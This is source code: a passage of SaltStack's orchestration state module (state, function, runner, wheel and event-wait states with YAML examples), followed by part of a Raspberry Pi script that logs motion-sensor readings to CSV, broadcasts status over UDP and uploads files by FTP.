"""
Named salt
"""
return __virtualname__
def _fire_args(tag_data):
try:
salt.utils.event.fire_args(__opts__, __orchestration_jid__, tag_data, "run")
except NameError:
log.debug("Unable to fire args event due to missing __orchestration_jid__")
def _parallel_map(func, inputs):
"""
Applies a function to each element of a list, returning the resulting list.
A separate thread is created for each element in the input list and the
passed function is called for each of the elements. When all threads have
finished execution a list with the results corresponding to the inputs is
returned.
If one of the threads fails (because the function throws an exception),
that exception is reraised. If more than one thread fails, the exception
from the first thread (according to the index of the input element) is
reraised.
func:
function that is applied on each input element.
inputs:
list of elements that shall be processed. The length of this list also
defines the number of threads created.
"""
outputs = len(inputs) * [None]
errors = len(inputs) * [None]
def create_thread(index):
def run_thread():
try:
outputs[index] = func(inputs[index])
except: # pylint: disable=bare-except
errors[index] = sys.exc_info()
thread = threading.Thread(target=run_thread)
thread.start()
return thread
threads = list(map(create_thread, range(len(inputs))))
for thread in threads:
thread.join()
for error in errors:
if error is not None:
exc_type, exc_value, exc_traceback = error
raise exc_value.with_traceback(exc_traceback)
return outputs
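# Minimal sketch of how _parallel_map behaves (the example function and inputs are
# hypothetical, illustration only): each input element is processed in its own thread,
# results come back in input order, and the first error (by input index) is re-raised.
if __name__ == "__main__":  # pragma: no cover - example only
    def _square(value):
        return value * value

    assert _parallel_map(_square, [1, 2, 3]) == [1, 4, 9]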
def state(
name,
tgt,
ssh=False,
tgt_type="glob",
ret="",
ret_config=None,
ret_kwargs=None,
highstate=None,
sls=None,
top=None,
saltenv=None,
test=None,
pillar=None,
pillarenv=None,
expect_minions=True,
exclude=None,
fail_minions=None,
allow_fail=0,
concurrent=False,
timeout=None,
batch=None,
queue=False,
subset=None,
orchestration_jid=None,
failhard=None,
**kwargs
):
"""
Invoke a state run on a given target
name
An arbitrary name used to track the state execution
tgt
The target specification for the state run.
.. versionadded:: 2016.11.0
Masterless support: When running on a masterless minion, the ``tgt``
is ignored and will always be the local minion.
tgt_type
The target type to resolve, defaults to ``glob``
ret
Optionally set a single or a list of returners to use
ret_config
Use an alternative returner configuration
ret_kwargs
Override individual returner configuration items
highstate
Defaults to None, if set to True the target systems will ignore any
sls references specified in the sls option and call state.highstate
on the targeted minions
top
Should be the name of a top file. If set, state.top is called with this
top file instead of state.sls.
sls
A group of sls files to execute. This can be defined as a single string
containing a single sls file, or a list of sls files
test
Pass ``test=true`` or ``test=false`` through to the state function. This
can be used to override a test mode set in the minion's config file. If
left as the default of None and the 'test' mode is supplied on the
command line, that value is passed instead.
pillar
Pass the ``pillar`` kwarg through to the state function
pillarenv
The pillar environment to grab pillars from
.. versionadded:: 2017.7.0
saltenv
The default salt environment to pull sls files from
ssh
Set to `True` to use the ssh client instead of the standard salt client
roster
In the event of using salt-ssh, a roster system can be set
expect_minions
An optional boolean for failing if some minions do not respond
fail_minions
An optional list of targeted minions where failure is an option
allow_fail
Pass in the number of minions to allow for failure before setting
the result of the execution to False
exclude
Pass exclude kwarg to state
concurrent
Allow multiple state runs to occur at once.
WARNING: This flag is potentially dangerous. It is designed
for use when multiple state runs can safely be run at the same time.
Do not use this flag for performance optimization.
queue
Pass ``queue=true`` through to the state function
batch
Execute the command :ref:`in batches <targeting-batch>`. E.g.: ``10%``.
.. versionadded:: 2016.3.0
subset
Number of minions from the targeted set to randomly use
.. versionadded:: 2017.7.0
failhard
pass failhard down to the executing state
.. versionadded:: 2019.2.2
Examples:
Run a list of sls files via :py:func:`state.sls <salt.state.sls>` on target
minions:
.. code-block:: yaml
webservers:
salt.state:
- tgt: 'web*'
- sls:
- apache
- django
- core
- saltenv: prod
Run sls file via :py:func:`state.sls <salt.state.sls>` on target
minions with exclude:
.. code-block:: yaml
docker:
salt.state:
- tgt: 'docker*'
- sls: docker
- exclude: docker.swarm
- saltenv: prod
Run a full :py:func:`state.highstate <salt.state.highstate>` on target
minions.
.. code-block:: yaml
databases:
salt.state:
- tgt: role:database
- tgt_type: grain
- highstate: True
"""
cmd_kw = {"arg": [], "kwarg": {}, "ret": ret, "timeout": timeout}
if ret_config:
cmd_kw["ret_config"] = ret_config
if ret_kwargs:
cmd_kw["ret_kwargs"] = ret_kwargs
state_ret = {"name": name, "changes": {}, "comment": "", "result": True}
try:
allow_fail = int(allow_fail)
except ValueError:
state_ret["result"] = False
state_ret["comment"] = "Passed invalid value for 'allow_fail', must be an int"
return state_ret
cmd_kw["tgt_type"] = tgt_type
cmd_kw["ssh"] = ssh
if "roster" in kwargs:
cmd_kw["roster"] = kwargs["roster"]
cmd_kw["expect_minions"] = expect_minions
if highstate:
fun = "state.highstate"
elif top:
fun = "state.top"
cmd_kw["arg"].append(top)
elif sls:
fun = "state.sls"
if isinstance(sls, list):
sls = ",".join(sls)
cmd_kw["arg"].append(sls)
else:
state_ret["comment"] = "No highstate or sls specified, no execution made"
state_ret["result"] = False
return state_ret
if test is not None or __opts__.get("test"):
cmd_kw["kwarg"]["test"] = test if test is not None else __opts__.get("test")
if pillar:
cmd_kw["kwarg"]["pillar"] = pillar
if pillarenv is not None:
cmd_kw["kwarg"]["pillarenv"] = pillarenv
if saltenv is not None:
cmd_kw["kwarg"]["saltenv"] = saltenv
if exclude is not None:
cmd_kw["kwarg"]["exclude"] = exclude
cmd_kw["kwarg"]["queue"] = queue
if isinstance(concurrent, bool):
cmd_kw["kwarg"]["concurrent"] = concurrent
else:
state_ret["comment"] = "Must pass in boolean for value of 'concurrent'"
state_ret["result"] = False
return state_ret
if batch is not None:
cmd_kw["batch"] = str(batch)
if subset is not None:
cmd_kw["subset"] = subset
if failhard is True or __opts__.get("failhard"):
cmd_kw["failhard"] = True
masterless = __opts__["__role"] == "minion" and __opts__["file_client"] == "local"
if not masterless:
_fire_args({"type": "state", "tgt": tgt, "name": name, "args": cmd_kw})
cmd_ret = __salt__["saltutil.cmd"](tgt, fun, **cmd_kw)
else:
if top:
cmd_kw["topfn"] = "".join(cmd_kw.pop("arg"))
elif sls:
cmd_kw["mods"] = "".join(cmd_kw.pop("arg"))
cmd_kw.update(cmd_kw.pop("kwarg"))
tmp_ret = __salt__[fun](**cmd_kw)
cmd_ret = {
__opts__["id"]: {
"ret": tmp_ret,
"out": tmp_ret.get("out", "highstate")
if isinstance(tmp_ret, dict)
else "highstate",
}
}
try:
state_ret["__jid__"] = cmd_ret[next(iter(cmd_ret))]["jid"]
except (StopIteration, KeyError):
pass
changes = {}
fail = set()
no_change = set()
if fail_minions is None:
fail_minions = ()
elif isinstance(fail_minions, str):
fail_minions = [minion.strip() for minion in fail_minions.split(",")]
elif not isinstance(fail_minions, list):
state_ret.setdefault("warnings", []).append(
"'fail_minions' needs to be a list or a comma separated string. Ignored."
)
fail_minions = ()
if not cmd_ret and expect_minions:
state_ret["result"] = False
state_ret["comment"] = "No minions returned"
return state_ret
for minion, mdata in cmd_ret.items():
if mdata.get("out", "") != "highstate":
log.warning("Output from salt state not highstate")
m_ret = False
if "return" in mdata and "ret" not in mdata:
mdata["ret"] = mdata.pop("return")
m_state = True
if mdata.get("failed", False):
m_state = False
else:
try:
m_ret = mdata["ret"]
except KeyError:
m_state = False
if m_state:
m_state = __utils__["state.check_result"](m_ret, recurse=True)
if not m_state:
if minion not in fail_minions:
fail.add(minion)
changes[minion] = m_ret
continue
try:
for state_item in m_ret.values():
if isinstance(state_item, dict):
if "changes" in state_item and state_item["changes"]:
changes[minion] = m_ret
break
else:
no_change.add(minion)
except AttributeError:
log.error("m_ret did not have changes %s %s", type(m_ret), m_ret)
no_change.add(minion)
if changes:
state_ret["changes"] = {"out": "highstate", "ret": changes}
if len(fail) > allow_fail:
state_ret["result"] = False
state_ret["comment"] = "Run failed on minions: {}".format(", ".join(fail))
else:
state_ret["comment"] = "States ran successfully."
if changes:
state_ret["comment"] += " Updating {}.".format(", ".join(changes))
if no_change:
state_ret["comment"] += " No changes made to {}.".format(
", ".join(no_change)
)
if test or __opts__.get("test"):
if state_ret["changes"] and state_ret["result"] is True:
# Test mode with changes is the only case where result should ever be none
state_ret["result"] = None
return state_ret
def function(
name,
tgt,
ssh=False,
tgt_type="glob",
ret="",
ret_config=None,
ret_kwargs=None,
expect_minions=False,
fail_minions=None,
fail_function=None,
arg=None,
kwarg=None,
timeout=None,
batch=None,
subset=None,
failhard=None,
**kwargs
): # pylint: disable=unused-argument
"""
Execute a single module function on a remote minion via salt or salt-ssh
name
The name of the function to run, e.g. cmd.run or pkg.install
tgt
The target specification, e.g. '*' for all minions
tgt_type
The target type, defaults to ``glob``
arg
The list of arguments to pass into the function
kwarg
The dict (not a list) of keyword arguments to pass into the function
ret
Optionally set a single or a list of returners to use
ret_config
Use an alternative returner configuration
ret_kwargs
Override individual returner configuration items
expect_minions
An optional boolean for failing if some minions do not respond
fail_minions
An optional list of targeted minions where failure is an option
fail_function
An optional string that points to a salt module that returns True or False
based on the returned data dict for individual minions
ssh
Set to `True` to use the ssh client instead of the standard salt client
roster
In the event of using salt-ssh, a roster system can be set
.. versionadded:: 3005
batch
Execute the command :ref:`in batches <targeting-batch>`. E.g.: ``10%``.
subset
Number of minions from the targeted set to randomly use
.. versionadded:: 2017.7.0
failhard
pass failhard down to the executing state
.. versionadded:: 2019.2.2
"""
func_ret = {"name": name, "changes": {}, "comment": "", "result": True}
if kwarg is None:
kwarg = {}
if isinstance(arg, str):
func_ret["warnings"] = ["Please specify 'arg' as a list of arguments."]
arg = arg.split()
cmd_kw = {"arg": arg or [], "kwarg": kwarg, "ret": ret, "timeout": timeout}
if batch is not None:
cmd_kw["batch"] = str(batch)
if subset is not None:
cmd_kw["subset"] = subset
cmd_kw["tgt_type"] = tgt_type
cmd_kw["ssh"] = ssh
if "roster" in kwargs:
cmd_kw["roster"] = kwargs["roster"]
cmd_kw["expect_minions"] = expect_minions
cmd_kw["_cmd_meta"] = True
if failhard is True or __opts__.get("failhard"):
cmd_kw["failhard"] = True
if ret_config:
cmd_kw["ret_config"] = ret_config
if ret_kwargs:
cmd_kw["ret_kwargs"] = ret_kwargs
fun = name
if __opts__["test"] is True:
func_ret["comment"] = "Function {} would be executed on target {}".format(
fun, tgt
)
func_ret["result"] = None
return func_ret
try:
_fire_args({"type": "function", "tgt": tgt, "name": name, "args": cmd_kw})
cmd_ret = __salt__["saltutil.cmd"](tgt, fun, **cmd_kw)
except Exception as exc: # pylint: disable=broad-except
func_ret["result"] = False
func_ret["comment"] = str(exc)
return func_ret
try:
func_ret["__jid__"] = cmd_ret[next(iter(cmd_ret))]["jid"]
except (StopIteration, KeyError):
pass
changes = {}
fail = set()
if fail_minions is None:
fail_minions = ()
elif isinstance(fail_minions, str):
fail_minions = [minion.strip() for minion in fail_minions.split(",")]
elif not isinstance(fail_minions, list):
func_ret.setdefault("warnings", []).append(
"'fail_minions' needs to be a list or a comma separated string. Ignored."
)
fail_minions = ()
for minion, mdata in cmd_ret.items():
m_ret = False
if mdata.get("retcode"):
func_ret["result"] = False
fail.add(minion)
if mdata.get("failed", False):
m_func = False
else:
if "return" in mdata and "ret" not in mdata:
mdata["ret"] = mdata.pop("return")
m_ret = mdata["ret"]
m_func = (not fail_function and True) or __salt__[fail_function](m_ret)
if m_ret is False:
m_func = False
if not m_func:
if minion not in fail_minions:
fail.add(minion)
changes[minion] = m_ret
if not cmd_ret:
func_ret["result"] = False
func_ret["comment"] = "No minions responded"
else:
if changes:
func_ret["changes"] = {"ret": changes}
if fail:
func_ret["result"] = False
func_ret["comment"] = "Running function {} failed on minions: {}".format(
name, ", ".join(fail)
)
else:
func_ret["comment"] = "Function ran successfully."
if changes:
func_ret["comment"] += " Function {} ran on {}.".format(
name, ", ".join(changes)
)
return func_ret
def wait_for_event(name, id_list, event_id="id", timeout=300, node="master"):
"""
Watch Salt's event bus and block until a condition is met
.. versionadded:: 2014.7.0
name
An event tag to watch for; supports Reactor-style globbing.
id_list
A list of event identifiers to watch for -- usually the minion ID. Each
time an event tag is matched the event data is inspected for
``event_id``, if found it is removed from ``id_list``. When ``id_list``
is empty this function returns success.
event_id : id
The name of a key in the event data. Default is ``id`` for the minion
ID, another common value is ``name`` for use with orchestrating
salt-cloud events.
timeout : 300
The maximum time in seconds to wait before failing.
The following example blocks until all the listed minions complete a
restart and reconnect to the Salt master:
.. code-block:: yaml
reboot_all_minions:
salt.function:
- name: system.reboot
- tgt: '*'
wait_for_reboots:
salt.wait_for_event:
- name: salt/minion/*/start
- id_list:
- jerry
- stuart
- dave
- phil
- kevin
- mike
- require:
- salt: reboot_all_minions
"""
ret = {"name": name, "changes": {}, "comment": "", "result": False}
if __opts__.get("test"):
ret["comment"] = "Orchestration would wait for event '{}'".format(name)
ret["result"] = None
return ret
with salt.utils.event.get_event(
node, __opts__["sock_dir"], opts=__opts__, listen=True
) as sevent:
del_counter = 0
starttime = time.time()
timelimit = starttime + timeout
while True:
event = sevent.get_event(full=True)
is_timedout = time.time() > timelimit
if event is None and not is_timedout:
log.trace("wait_for_event: No event data; waiting.")
continue
elif event is None and is_timedout:
ret["comment"] = "Timeout value reached."
return ret
if fnmatch.fnmatch(event["tag"], name):
val = event["data"].get(event_id)
if val is None and "data" in event["data"]:
val = event["data"]["data"].get(event_id)
if val is not None:
try:
val_idx = id_list.index(val)
except ValueError:
log.trace(
"wait_for_event: Event identifier '%s' not in "
"id_list; skipping.",
event_id,
)
else:
del id_list[val_idx]
del_counter += 1
minions_seen = ret["changes"].setdefault("minions_seen", [])
minions_seen.append(val)
log.debug(
"wait_for_event: Event identifier '%s' removed "
"from id_list; %s items remaining.",
val,
len(id_list),
)
else:
log.trace(
"wait_for_event: Event identifier '%s' not in event "
"'%s'; skipping.",
event_id,
event["tag"],
)
else:
log.debug("wait_for_event: Skipping unmatched event '%s'", event["tag"])
if len(id_list) == 0:
ret["result"] = True
ret["comment"] = "All events seen in {} seconds.".format(
time.time() - starttime
)
return ret
if is_timedout:
ret["comment"] = "Timeout value reached."
return ret
def runner(name, **kwargs):
"""
Execute a runner module on the master
.. versionadded:: 2014.7.0
name
The name of the function to run
kwargs
Any keyword arguments to pass to the runner function
.. code-block:: yaml
run-manage-up:
salt.runner:
- name: manage.up
"""
try:
jid = __orchestration_jid__
except NameError:
log.debug("Unable to fire args event due to missing __orchestration_jid__")
jid = None
if __opts__.get("test", False):
ret = {
"name": name,
"result": None,
"changes": {},
"comment": "Runner function '{}' would be executed.".format(name),
}
return ret
out = __salt__["saltutil.runner"](
name, __orchestration_jid__=jid, __env__=__env__, full_return=True, **kwargs
)
runner_return = out.get("return")
if isinstance(runner_return, dict) and "Error" in runner_return:
out["success"] = False
success = out.get("success", True)
ret = {"name": name, "changes": {"return": runner_return}, "result": success}
ret["comment"] = "Runner function '{}' {}.".format(
name,
"executed" if success else "failed",
)
ret["__orchestration__"] = True
if "jid" in out:
ret["__jid__"] = out["jid"]
return ret
def parallel_runners(name, runners, **kwargs): # pylint: disable=unused-argument
"""
Executes multiple runner modules on the master in parallel.
.. versionadded:: 2018.3.0
A separate thread is spawned for each runner. This state is intended to be
used with the orchestrate runner in place of the ``saltmod.runner`` state
when different tasks should be run in parallel. In general, Salt states are
not safe when used concurrently, so ensure that they are used in a safe way
(e.g. by only targeting separate minions in parallel tasks).
name:
name identifying this state. The name is provided as part of the
output, but not used for anything else.
runners:
list of runners that should be run in parallel. Each element of the
list has to be a dictionary. This dictionary's name entry stores the
name of the runner function that shall be invoked. The optional kwarg
entry stores a dictionary of named arguments that are passed to the
runner function.
.. code-block:: yaml
parallel-state:
salt.parallel_runners:
- runners:
my_runner_1:
- name: state.orchestrate
- kwarg:
mods: orchestrate_state_1
my_runner_2:
- name: state.orchestrate
- kwarg:
mods: orchestrate_state_2
"""
# For the sake of consistency, we treat a single string in the same way as
# a key without a value. This allows something like
# salt.parallel_runners:
# - runners:
# state.orchestrate
# Obviously, this will only work if the specified runner does not need any
# arguments.
if isinstance(runners, str):
runners = {runners: [{name: runners}]}
# If the runners argument is not a string, it must be a dict. Everything
# else is considered an error.
if not isinstance(runners, dict):
return {
"name": name,
"result": False,
"changes": {},
"comment": "The runners parameter must be a string or dict.",
}
# The configuration for each runner is given as a list of key-value pairs.
# This is not very useful for what we want to do, but it is the typical
# style used in Salt. For further processing, we convert each of these
# lists to a dict. This also makes it easier to check whether a name has
# been specified explicitly.
for runner_id, runner_config in runners.items():
if runner_config is None:
runner_config = {}
else:
runner_config = salt.utils.data.repack_dictlist(runner_config)
if "name" not in runner_config:
runner_config["name"] = runner_id
runners[runner_id] = runner_config
try:
jid = __orchestration_jid__
except NameError:
log.debug("Unable to fire args event due to missing __orchestration_jid__")
jid = None
def call_runner(runner_config):
return __salt__["saltutil.runner"](
runner_config["name"],
__orchestration_jid__=jid,
__env__=__env__,
full_return=True,
**(runner_config.get("kwarg", {}))
)
try:
outputs = _parallel_map(call_runner, list(runners.values()))
except salt.exceptions.SaltException as exc:
return {
"name": name,
"result": False,
"success": False,
"changes": {},
"comment": "One of the runners raised an exception: {}".format(exc),
}
# We bundle the results of the runners with the IDs of the runners so that
# we can easily identify which output belongs to which runner. At the same
# time we extract the actual return value of the runner (saltutil.runner
# adds some extra information that is not interesting to us).
outputs = {
runner_id: out["return"] for runner_id, out in zip(runners.keys(), outputs)
}
# If each of the runners returned its output in the format compatible with
# the 'highstate' outputter, we can leverage this fact when merging the
# outputs.
highstate_output = all(
[
out.get("outputter", "") == "highstate" and "data" in out
for out in outputs.values()
]
)
# The following helper function is used to extract changes from highstate
# output.
def extract_changes(obj):
if not isinstance(obj, dict):
return {}
elif "changes" in obj:
if (
isinstance(obj["changes"], dict)
and obj["changes"].get("out", "") == "highstate"
and "ret" in obj["changes"]
):
return obj["changes"]["ret"]
else:
return obj["changes"]
else:
found_changes = {}
for key, value in obj.items():
change = extract_changes(value)
if change:
found_changes[key] = change
return found_changes
if highstate_output:
failed_runners = [
runner_id
for runner_id, out in outputs.items()
if out["data"].get("retcode", 0) != 0
]
all_successful = not failed_runners
if all_successful:
comment = "All runner functions executed successfully."
else:
runner_comments = [
"Runner {} failed with return value:\n{}".format(
runner_id,
salt.output.out_format(
outputs[runner_id], "nested", __opts__, nested_indent=2
),
)
for runner_id in failed_runners
]
comment = "\n".join(runner_comments)
changes = {}
for runner_id, out in outputs.items():
runner_changes = extract_changes(out["data"])
if runner_changes:
changes[runner_id] = runner_changes
else:
failed_runners = [
runner_id
for runner_id, out in outputs.items()
if out.get("exit_code", 0) != 0
]
all_successful = not failed_runners
if all_successful:
comment = "All runner functions executed successfully."
else:
if len(failed_runners) == 1:
comment = "Runner {} failed.".format(failed_runners[0])
else:
comment = "Runners {} failed.".format(", ".join(failed_runners))
changes = {"ret": {runner_id: out for runner_id, out in outputs.items()}}
ret = {
"name": name,
"result": all_successful,
"changes": changes,
"comment": comment,
}
# The 'runner' function includes out['jid'] as '__jid__' in the returned
# dict, but we cannot do this here because we have more than one JID if
# we have more than one runner.
return ret
def wheel(name, **kwargs):
"""
Execute a wheel module on the master
.. versionadded:: 2014.7.0
name
The name of the function to run
kwargs
Any keyword arguments to pass to the wheel function
.. code-block:: yaml
accept_minion_key:
salt.wheel:
- name: key.accept
- match: frank
"""
ret = {"name": name, "result": False, "changes": {}, "comment": ""}
try:
jid = __orchestration_jid__
except NameError:
log.debug("Unable to fire args event due to missing __orchestration_jid__")
jid = None
if __opts__.get("test", False):
ret["result"] = (None,)
ret["changes"] = {}
ret["comment"] = "Wheel function '{}' would be executed.".format(name)
return ret
out = __salt__["saltutil.wheel"](
name, __orchestration_jid__=jid, __env__=__env__, **kwargs
)
wheel_return = out.get("return")
if isinstance(wheel_return, dict) and "Error" in wheel_return:
out["success"] = False
success = out.get("success", True)
ret = {"name": name, "changes": {"return": wheel_return}, "result": success}
ret["comment"] = "Wheel function '{}' {}.".format(
name,
"executed" if success else "failed",
)
ret["__orchestration__"] = True
if "jid" in out:
ret["__jid__"] = out["jid"]
return ret
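# Hedged sketch (illustration only) of the return-dict convention shared by the state
# functions in this module: Salt expects exactly the keys name/result/changes/comment,
# with result None reserved for test mode when changes would be made.
if __name__ == "__main__":  # pragma: no cover - example only
    example_ret = {
        "name": "run-manage-up",
        "result": True,
        "changes": {},
        "comment": "Runner function 'manage.up' executed.",
    }
    assert set(example_ret) == {"name", "result", "changes", "comment"}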
|
threads.py
|
import socket
from threading import Thread
from collections import defaultdict
from datetime import datetime
import os
import time
# from config import channels_dict, ip_server, ip_client, TIME_FORMAT, __version__
from config import channels_dict, TIME_FORMAT, __version__
from ftplib import FTP
import pandas as pd
import sys
def send_via_ftp(session_ftp, path2file, ftp_filename):
file = open(path2file, 'rb')
# print('new file name is ', file_prefix + '.csv')
### MAYBE FILE IS ALREADY ON THE SERVER
ftp_files = session_ftp.nlst()
if ftp_filename in ftp_files:
print('The file ' + ftp_filename + ' is already on the server. I\'m not going to overwrite it.')
else:
ftp_command = 'STOR ' + ftp_filename
print(ftp_command)
try:
print('Transferring data via FTP...')
session_ftp.storbinary(ftp_command, file) # send the file
print('I didn\'t get an FTP error')
except Exception:
print('I got an FTP error :', sys.exc_info())
print('But probably that\'s ok')
file.close()
def get_df_total(folder):
filenames_list = os.listdir(folder)
filenames_list = sorted([int(filename[:-4]) for filename in filenames_list if filename[-4:] == '.csv'])
filenames_list = [str(x) + '.csv' for x in filenames_list]
df_total = None
for filename in filenames_list:
df = pd.read_csv(folder + '/' + filename, dtype=str)
if df_total is None:
df_total = df
else:
df_total = pd.concat([df_total, df], axis=0).reset_index(drop=True)
return df_total
def get_server_client_ports(channel_id, sensor_id, player_id):
port_server = '6' + channel_id + sensor_id + player_id
port_client = '60' + channel_id + sensor_id
return int(port_server), int(port_client)
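# Quick sketch of the port-derivation scheme above (the IDs below are hypothetical,
# illustration only): the server port is '6' + channel + sensor + player, the client
# port is '60' + channel + sensor.
if __name__ == '__main__':  # example only
    srv, cli = get_server_client_ports(channel_id='1', sensor_id='2', player_id='3')
    assert (srv, cli) == (6123, 6012)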
def get_socket(ip, port):
print('Trying to create a socket with ip=' + str(ip) + ', port=' + str(port))
new_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
new_socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
if ip == '':
new_socket.bind((ip, port))
return new_socket
# def get_ports_adresses_sockets(ip_server, ip_client, channels_dict, sensor_id, player_id,
# get_server_sockets=True, get_client_sockets=False):
def get_ports_adresses_sockets(channels_dict, sensor_id, player_id, ip_server,
get_server_sockets=True, get_client_sockets=False):
ports = defaultdict(dict)
addresses = defaultdict(dict)
sockets = defaultdict(dict)
# TODO: change ip_server and ip_client to <broadcast> and ''
for channel_name, channel_id in channels_dict.items():
ports['server'][channel_name], ports['client'][channel_name] = get_server_client_ports(
channel_id=channel_id,
sensor_id=sensor_id,
player_id=player_id)
# addresses['server'][channel_name] = (ip_server, ports['server'][channel_name])
# addresses['client'][channel_name] = (ip_client, ports['client'][channel_name])
# if channel_name == 'cmd':
# ip_server = '255.255.255.255'
# ip_client = ''
# else:
# ip_client = '255.255.255.255'
# ip_server = ''
# ip_client = '255.255.255.255'
# ip_server = '255.255.255.255'
# addresses['server'][channel_name] = (ip_server, ports['server'][channel_name])
# addresses['client'][channel_name] = (ip_client, ports['client'][channel_name])
addresses['server'][channel_name] = (ip_server, ports['server'][channel_name])
# addresses['server'][channel_name] = ('255.255.255.255', ports['server'][channel_name])
addresses['client'][channel_name] = ('255.255.255.255', ports['client'][channel_name])
if get_server_sockets:
# sockets['server'][channel_name] = get_socket(ip_server, ports['server'][channel_name])
sockets['server'][channel_name] = get_socket('', ports['server'][channel_name])
if get_client_sockets:
# sockets['client'][channel_name] = get_socket(ip_client, ports['client'][channel_name])
sockets['client'][channel_name] = get_socket('', ports['client'][channel_name])
return ports, addresses, sockets
def time_format2timefile_format(x):
return x[:19].replace(':', '-')
class SocketThread(Thread):
def __init__(self, socket, name=None):
super().__init__()
self.socket = socket
if name is not None:
self.name = name
def send(self, msg, address):
"""
:param address: tuple (ip, port)
:param msg: string message
"""
self.socket.sendto(msg.encode(), address)
class ListenerThread(SocketThread):
def __init__(self, *args, verbose=False, **kwargs):
super().__init__(*args, **kwargs)
self.verbose = verbose
def run(self):
print('Thread ' + self.name + ' is listening...')
while True:
msg, addr = self.socket.recvfrom(1024) # buffer size is 1024 bytes
msg = msg.decode()
if self.verbose:
print("received message:", msg)
print("sender:", addr)
class FtpThread(Thread):
def __init__(self, ftp_ip, login, password):
super().__init__()
self.ftp_ip = ftp_ip
self.login = login
self.password = password
self.session_ftp = FTP(ftp_ip, login, password)
def send(self, path2file, ftp_filename):
send_via_ftp(self.session_ftp, path2file, ftp_filename)
class SenderThread(SocketThread):
def __init__(self, opponent_address, *args, period=0.5, **kwargs):
super().__init__(*args, **kwargs)
self.opponent_address = opponent_address
self.period = period
self.periodic_sending = False
def __repr__(self):
repr = self.__class__.__name__ + '__' + super().__repr__()
return repr
def get_response_msg(self):
return 'not implemented yet'
def send(self, msg=None, address=None):
if msg is None:
msg = self.get_response_msg()
if address is None:
address = self.opponent_address
self.socket.sendto(msg.encode(), address)
def run(self):
while True:
if self.periodic_sending:
self.send()
time.sleep(self.period)
class StatusThread(SenderThread):
def __init__(self, *args, key_order=None, **kwargs):
super().__init__(*args, **kwargs)
self.info_dict = {}
if key_order is None:
    key_order = ['sensor_name', 'version', 'support_cmd', 'status']
self.key_order = key_order  # previously left undefined when a custom key_order was passed
def __setitem__(self, key, value):
self.info_dict[key] = value
def __repr__(self):
repr = self.__class__.__name__ + '__' + super().__repr__() + '__' + str(self.get_response_msg())
return repr
def get_response_msg(self):
response_values = []
for key in self.key_order:
value2append = self.info_dict.get(key, '')
response_values.append(value2append)
response_msg = ','.join(response_values)
return response_msg
class TimeThread(SenderThread):
TIME_THREAD_FORMAT = '%H:%M:%S.%f'
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def get_response_msg(self):
response_msg = datetime.now().strftime(self.TIME_THREAD_FORMAT)[:-3]
return response_msg
# # def send(self, msg=None, address=None):
# def send(self, msg=None, address='255.255.255.255'): # Probably this broadcast address is not needed anymore
# if msg is None:
# msg = self.get_response_msg()
#
# if address is None:
# address = self.opponent_address
#
# self.socket.sendto(msg.encode(), address)
class AcknowledgementThread(SenderThread):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
### That's actually the same in this form
class MeasurementsThread(SocketThread):
def __init__(self,
socket,
response_address,
mpu9250,
ftp_thread,
# *args,
kwargs,
package_num=0,
):
### NOTE: forwarding **kwargs to the parent __init__ did not work here, so kwargs is taken as a plain dict argument
# super().__init__(socket, *args, **kwargs)
super().__init__(socket)# , **kwargs)
self.socket = socket
# self.response_address = response_address
self.response_address = response_address # TODO: WARNING
self.mpu9250 = mpu9250
self.ftp_thread = ftp_thread
self.timestep_detect = kwargs['timestep_detect']
self.timestep_send = kwargs['timestep_send']
self.max_time = kwargs['max_time']
self.verbose = kwargs['verbose']
self.label = kwargs['label']
self.person_id = kwargs['person_id']
self.meta = kwargs['meta']
self.send_data = kwargs['send_data']
self.save_data = kwargs['save_data']
self.folder = kwargs['folder']
self.synchronize_time = kwargs['synchronize_time']
self.stop = False # Stop variable
self.batch_size = int(self.timestep_send / self.timestep_detect) # number of measurements per file
self.n_batches = int(self.max_time / self.timestep_send) # number of batches (file sends) in total
self.package_num = package_num
def stop_measurements(self):
self.stop = True
print('Stopping')
# TODO: It looks like new folders need to be created here or nearby
@staticmethod
def get_sleep_time(timestep_detect):
current_time = time.time()
time2sleep = timestep_detect - current_time % timestep_detect
return time2sleep
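# Worked example of the alignment above (numbers are hypothetical, illustration only):
# with timestep_detect = 0.5 and time.time() = 100.3, time2sleep = 0.5 - 100.3 % 0.5 = 0.2,
# so the next reading lands on the 100.5 grid point and samples keep a fixed cadence.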
def run(self):
if self.folder is None:
folder = datetime.now().strftime(TIME_FORMAT)[:-3]
else:
folder = self.folder
self.folder = folder # FOR THE FTP
# prefix = '../data/' + folder + '/'
prefix = '/home/pi/data/' + folder + '/'
# os.mkdir('../data/' + folder) # Here we will store data in batches
os.mkdir(prefix) # Here we will store data in batches
data_header = ['datetime_now', 'acc_x', 'acc_y', 'acc_z', 'gyro_x', 'gyro_y', 'gyro_z', 'mag_x', 'mag_y',
'mag_z']
data_header2write = ','.join(data_header) + '\n'
for n_batch in range(self.n_batches):
filename = prefix + str(n_batch) + '.csv'
file = open(filename, 'w')
file.write(data_header2write)
for n_measurement in range(self.batch_size):
data_accelerometer = self.mpu9250.readAccel()
data_gyroscope = self.mpu9250.readGyro()
data_magnetometer = self.mpu9250.readMagnet()
# data_magnetometer = {
# 'x': -1,
# 'y': -1,
# 'z': -1,
# }
if self.verbose:
if (n_measurement % self.verbose) == 0:
print('data_accelerometer: ', data_accelerometer)
print('data_gyroscope: ', data_gyroscope)
print('data_magnetometer: ', data_magnetometer)
datetime_current = datetime.now()
datetime_current_isoformat = datetime_current.isoformat()
if n_measurement == 0:
first_datetime_in_batch = datetime_current.strftime(TIME_FORMAT)
first_datetime_in_batch = time_format2timefile_format(first_datetime_in_batch)
measurement_data = [
datetime_current_isoformat,
data_accelerometer['x'],
data_accelerometer['y'],
data_accelerometer['z'],
data_gyroscope['x'],
data_gyroscope['y'],
data_gyroscope['z'],
data_magnetometer['x'],
data_magnetometer['y'],
data_magnetometer['z'],
]
# measurement_data = [str(value) for value in measurement_data] # Commented on 31 Oct to fix rounding
for i in range(1, len(measurement_data)): # Rounding to exactly 3 digits
measurement_data[i] = "%.3f" % measurement_data[i]
# ### It looks like the trick above is not enough to round to exactly 3 digits.
# ### That's why I added the code below
# value_parts = measurement_data[i].split('.')
# value_parts[1] = value_parts[1][:3] # Cutting everything after the 3rd digit
# measurement_data[i] = '.'.join(value_parts)
